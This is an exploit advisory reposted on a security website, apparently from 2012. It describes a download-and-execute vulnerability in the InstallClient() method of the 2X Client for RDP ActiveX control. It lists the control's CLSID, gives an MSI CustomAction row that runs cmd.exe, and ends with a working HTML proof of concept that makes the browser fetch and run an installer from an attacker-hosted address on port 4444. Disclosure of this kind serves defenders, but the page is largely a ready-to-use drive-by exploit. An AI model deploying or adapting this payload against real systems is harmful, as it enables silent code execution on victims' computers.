首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
2X Client for RDP 10.1.1204 ClientSystem Class ActiveX Control Download and Exec
来源:vfocus.net 作者:rgod 发布时间:2012-03-20  
2X Client for RDP 10.1.1204 ClientSystem Class ActiveX Control
TuxClientSystem.dll InstallClient() Download and Execute
Vulnerability
tested against: Microsoft Windows Vista SP2
                Microsoft Windows Server 2003 r2 sp2
                Internet Explorer 8
vendor description:
"2X Software is a global leader of desktop and application delivery,
remote access and cloud computing solutions."
2x homepage: http://www.2x.com/
download url: http://www.2x.com/rdp-client/windows-linux-mac/downloadlinks/
file tested: 2XClient.msi
Background:
the mentioned product installs an ActiveX control with the following
settings:
ProgID: TuxClientSystem.ClientSystem.1
CLSID: {F5DF8D65-559D-4b75-8562-5302BD2F5F20}
Binary path: C:\Program Files\2X\Client\TuxClientSystem.dll
Implements IObjectSafety: True
Safe for Scripting: True
Safe for Initialization: ?
According to the IObjectSafety interface this control is Safe
for Scripting, then Internet Explorer will allow the scripting
of this control.
Vulnerability:
...
/* DISPID=2 */
 function InstallClient(
  /* VT_BSTR [8] [in] */ $msiPath,
  /* VT_I4 [3]  */ $bFullInstallation
  )
 {
  /* method InstallClient */
 }
...
The first argument of this method accepts a file location on the
internet. By supplying the url of a .msi installer, the mentioned
control will download and execute the file without no user
interaction other then browsing a web page.
To demonstrate this vulnerability I modified an
existing standalone msi installer through free availiable tools
by replacing a CustomAction row with the following values:
Action  Type    Source                                                  Target                       ExtendedType
Run 226 SystemFolder.98CB24AD_52FB_DB5F_FF1F_C8B3B9A1E18E """cmd.exe"" /c start calc"  <null>
As attachment:
9sg_2x.html - host on a web server and change the position of x.msi
              then browse this page
POC:
<!-- 2X Client for RDP 10.1 ClientSystem Class ActiveX Control TuxClientSystem.dll
     InstallClient() Download and Execute Vulnerability PoC
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:F5DF8D65-559D-4B75-8562-5302BD2F5F20' id='obj' />
</object>
<script>
obj.InstallClient("http://192.168.2.101:4444/x.msi",1);
</script>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·LANDesk Lenovo ThinkManagement
·2X ApplicationServer 10.1 TuxS
·LANDesk Lenovo ThinkManagement
·VLC v. 2.0.1.0 .tta Memory Cor
·Dell Webcam Software Bundled A
·VLC v. 2.0.1.0 .jls DOS
·Joomla 2.5.0-2.5.1 Time Based
·VLC v. 2.0.1.0 .voc Memory Cor
·Zinf Audio Player (m3u file) B
·Telnet-Ftp Server <=v1.218 Rem
·TypesoftFTP Server 1.1 Remote
·RM Downloader Version 3.1.3.3.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved